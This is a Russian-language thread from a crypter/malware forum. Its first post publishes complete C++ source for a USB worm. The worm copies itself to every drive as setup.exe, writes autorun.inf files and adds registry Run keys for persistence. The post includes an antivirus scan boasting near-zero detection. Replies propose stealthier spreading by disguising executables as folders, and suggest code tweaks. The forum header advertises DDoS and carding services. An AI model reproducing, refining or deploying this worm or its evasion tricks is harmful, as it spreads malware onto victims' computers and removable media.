FuckAV - Форум о крипторах

Анонимный антивирусный сканер VPN-сервис
[Copi]Team DDoS Service

SEO статьи - блог от создателя FuckAV | KOROVKA.so | Качественный VPN Service MultiVPN - PPTP/OpenVPN/DoubleVPN

Реклама на форуме | Помощь форуму | Аварийный блог

Наш Jabber-сервер расположен по адресу fuckav.in. Добро пожаловать!!!

Вернуться  

Для того, чтобы ответить в теме, необходимо зарегистрироваться.
 
Опции темы Опции просмотра
Старый 27-01-2014   #1
IBM

xor esp, esp
 
Аватар для IBM

Последняя активность:
1 день назад
Регистрация: 30.11.2013
Сообщений: 76
Поблагодарили всего: 160
за это сообщение: 2
По умолчанию [C++] USB червь

Код:
#include <windows.h>
#include "stdio.h"

HKEY key;
int count = 0;
char scount[3];

char selfPath[MAX_PATH]; 


void GetAll()
  {
    GetModuleFileName(0, selfPath, sizeof(selfPath));
  }
void InfectDisk(LPCTSTR autopath)
  {
    count++;
    char drive[3];
    char target[MAX_PATH];
    char name[24];
    _splitpath(autopath, drive, 0, 0, 0);
    FILE *file=fopen(autopath, "w");
    fprintf(file, "[autorun]\nOpen=setup.exe\n");
    fprintf(file, "icon=%%SystemRoot%%\\system32\\SHELL32.dll,4\n");
    fprintf(file, "action=Open folder to view files\n");
    fprintf(file, "shell\\open=Open\n");
    fprintf(file, "shell\\open\\command=setup.exe\n");
    fprintf(file, "shell\\open\\default=1\n");
    fclose(file);       
    strcpy(target, drive);
    strcat(target, "\\");
    strcat(target, "setup.exe");
    RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0,KEY_WRITE, &key);
    strcpy(name, "update_");
    itoa(count, scount, 10);
    strcat(name, scount);
    RegSetValueEx(key,name,0,REG_SZ,(BYTE *)target,sizeof(target));
    RegCloseKey(key); 
    CopyFile(selfPath, target, true); 
  }

int main()
  {
    GetAll();
    for(;;)
      {
        char buf[26];
        const char *inffile = "autorun.inf"; 
        char *sname;
        GetLogicalDriveStringsA(sizeof(buf), buf);
        for (char *s = buf; *s; s+=strlen(s)+1) 
          {
            strcpy(sname, s);
            strcat(sname, inffile);    
            InfectDisk(sname);
          }
        count = 0;
        Sleep(15000);
      }  
  }
И так, червь копируется на все диски каждые 15 секунд с именем setup.exe

Так же на каждом диске, каждые 15 секунд создает autorun.inf с содержимым:

Код:
[autorun]
Open=setup.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=setup.exe
shell\open\default=1


Автозапуск с помощью HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run

Имя ключа update_%номер записи%
Значением является путь до каждой копии на зараженных дисках.

номер записи является от единицы и до количества зараженных дисков.

Детект:

Название файла: main.exe
Размер файла: 21090 байт
Дата сканирования: Mon, 27 Jan 14 13:44:54 -0500
MD5-хэш файла: f075167cbee9547e7f5a97c6480fe02c

Результат: 1 из 36

Ad-Aware: OK
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: OK
AVG: OK
Avira: OK
Bitdefender/BullGuard: OK
BullGuard Internet Security 2013: OK
Comodo: OK
Dr.Web: OK
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: OK
Fortinet 5: OK
F-Prot: OK
F-Secure 2014: OK
G Data: OK
IKARUS: OK
Immunet/ClamAV: OK
K7 Ultimate: OK
Kaspersky Internet Security 2014: OK
McAfee Total Protection 2013: OK
Microsoft Security Essentials: Worm:Win32/Autorun.gen!BT
NANO: OK
NOD32: OK
Norman: OK
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: OK
VBA: OK
VIPRE Internet Security 2013: OK
Virit: OK

Scan report generated by Scanner.FuckAV.ru

Если ваш ник Mr.Burns:

Скрытый текст


Закрой вкладку и не ной.
IBM вне форума  
Сказали спасибо:
by_dmr (02-02-2014), POCT (27-01-2014)


Старый 02-02-2014   #2
olegteror

Windows Seven
 
Аватар для olegteror

Регистрация: 01.04.2010
Сообщений: 1,121
Поблагодарили всего: 384
за это сообщение: 0
ICQ 627590
Jabber libhands is installed!
По умолчанию Re: [C++] USB червь

Цитата:
Сообщение от ;93930
Так же на каждом диске, каждые 15 секунд создает autorun.inf с содержимым:
Вопрос.а НАХУЯ? если можно 1 раз создать и проверять присутствие сие.
__________________

Слегка неадекватен.
olegteror вне форума  
Старый 02-02-2014   #3
n00b

Windows v.3.51 (NT)
 
Аватар для n00b

Регистрация: 07.10.2013
Сообщений: 144
Поблагодарили всего: 72
за это сообщение: 1
Jabber удалил
По умолчанию Re: [C++] USB червь

Цитата:
Сообщение от olegteror Посмотреть сообщение
Вопрос.а НАХУЯ? если можно 1 раз создать и проверять присутствие сие.
вово, + файл авторан только будет палить вирус перед АВерами...
Будет логичнее сделать так: все папки на флехе сделать скрытыми, скопировать .exe с таким количеством сколько папок и с такими же именами, иконка - как у папки. После открытия .exe она открывает папку к которой обращались. Если антивирус молчит, то ты хуй догадаешься что флеха заражена
__________________
Умнее меня? Посмотри на мой ник!
n00b вне форума  
Сказали спасибо:
onthar (02-02-2014)
Старый 02-02-2014   #4
IBM
Topic starter

xor esp, esp
 
Аватар для IBM

Последняя активность:
1 день назад
Регистрация: 30.11.2013
Сообщений: 76
Поблагодарили всего: 160
за это сообщение: 1
По умолчанию Re: [C++] USB червь

Цитата:
Сообщение от olegteror Посмотреть сообщение
Вопрос.а НАХУЯ? если можно 1 раз создать и проверять присутствие сие.
Ну что бы сделать такую проверку, то нужно еще и содержимое проверять или md5 сумму, ибо на каждой второй флешке есть этот ваш autorun.inf, за тем и перезаписываем их каждые 15 минут, что бы действий меньше.

Цитата:
Сообщение от n00b
вово, + файл авторан только будет палить вирус перед АВерами...
Будет логичнее сделать так: все папки на флехе сделать скрытыми, скопировать .exe с таким количеством сколько папок и с такими же именами, иконка - как у папки. После открытия .exe она открывает папку к которой обращались. Если антивирус молчит, то ты хуй догадаешься что флеха заражена
Раз такой умный возьми и сделай
IBM вне форума  
Сказали спасибо:
by_dmr (02-02-2014)
Старый 02-02-2014   #5
Mr.Burns

Windows 95

Последняя активность:
10-02-2014
Регистрация: 07.11.2010
Сообщений: 115
Поблагодарили всего: 87
за это сообщение: 0
По умолчанию Re: [C++] USB червь

Цитата:
Сообщение от Nu11ers3t Посмотреть сообщение
strcpy(target, drive);
strcat(target, "\\");
strcat(target, "setup.exe");

Код:
wsprintf(target, "%s\\%s", drive, "setup.exe");
Код:
wsprintf(target, "%s\\setup.exe", drive);
Mr.Burns вне форума  
Старый 15-02-2014   #6
n00b

Windows v.3.51 (NT)
 
Аватар для n00b

Регистрация: 07.10.2013
Сообщений: 144
Поблагодарили всего: 72
за это сообщение: 0
Jabber удалил
По умолчанию Re: [C++] USB червь

что все на советы так хреново откликаются? я уж молчу про критику
__________________
Умнее меня? Посмотри на мой ник!
n00b вне форума  
Старый 09-04-2014   #7
denant

Заблокирован

Последняя активность:
06-06-2014
Регистрация: 09.04.2014
Сообщений: 20
Поблагодарили всего: 6
за это сообщение: 0
По умолчанию Re: [C++] USB червь

Цитата:
Сообщение от olegteror Посмотреть сообщение
Вопрос.а НАХУЯ? если можно 1 раз создать и проверять присутствие сие.
Тебе жалко жесткий жертвы? А так автор прав, для проверки на то, что это твои файлы, придется добавлять лишний код
denant вне форума  
Для того, чтобы ответить в теме, необходимо зарегистрироваться.

Метки
autorun, char, count, drive, file, setup, target, wsprintf, папки, сделать, червь


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Delphi] Червь с использованием криптографии IBM Pascal/Delphi 0 10-12-2013 19:56
Червь на ассемблере [FASM] IBM Assembler 0 10-12-2013 19:10
Нужен червь kxp Помощь 2 14-11-2013 21:11
Червь W32/Fizzer-mm Andres N. Корзина 1 10-01-2011 19:07

Часовой пояс GMT +3, время: 04:20.



Powered by vBulletin® Copyright ©2000 - 2014, Jelsoft Enterprises Ltd. Перевод: zCarot
Други: SEO блог Deymos'a| ProLogic.Su| DServers.ru| Форум веб-мастеров